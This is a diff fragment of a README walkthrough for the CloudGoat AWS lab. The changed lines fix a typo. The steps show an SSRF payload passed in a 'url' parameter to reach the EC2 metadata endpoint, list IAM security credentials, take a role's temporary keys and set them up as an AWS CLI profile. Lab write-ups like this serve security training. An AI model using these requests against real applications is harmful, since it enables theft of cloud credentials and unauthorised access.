metalmandalore/cloud-goat_walkthrough/README.md

 `http://<publicURL/?url=http://169.254.169.254/latest/meta-data`
 9. What a helpful app, attempt discover any security-credentials which may be accessible
 `http://<publicURL/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/`
-10. Navigate to the resuting role name
+10. Navigate to the resulting role name
 `http://<publicURL/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>`
 11. Document the new credentials and create a new AWS CLI profile
 `aws configure --profile cg`